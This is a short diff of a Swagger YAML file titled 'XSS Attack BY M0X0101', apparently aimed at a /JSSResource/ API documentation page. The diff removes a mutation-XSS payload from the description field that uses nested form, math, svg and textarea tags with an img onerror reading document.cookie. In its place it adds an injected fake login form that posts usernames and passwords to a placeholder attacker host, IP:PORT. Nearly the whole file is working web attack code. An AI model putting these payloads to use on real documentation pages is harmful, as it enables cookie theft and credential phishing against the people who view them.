--- a/xss.yaml
+++ b/xss.yaml
@@ -2,7 +2,10 @@ swagger: '2.0'
 info:
   title: XSS Attack BY M0X0101
   description: |
-    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
+    <form action=http://IP:PORT>Username:<br>
+<input type=”username” name=”username”></br>Password:<br>
+<input type=”username” name=”password”></br><br>
+<input type=”submit” value=”Login”></br>
   version: production
 basePath: /JSSResource/
 produces:
